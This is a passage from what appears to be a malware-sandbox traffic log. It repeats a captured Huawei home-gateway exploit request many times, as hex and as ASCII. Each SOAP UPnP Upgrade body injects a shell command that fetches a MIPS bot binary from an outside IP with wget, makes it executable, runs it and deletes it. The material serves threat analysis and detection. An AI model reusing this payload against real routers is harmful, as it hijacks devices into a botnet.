/tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf 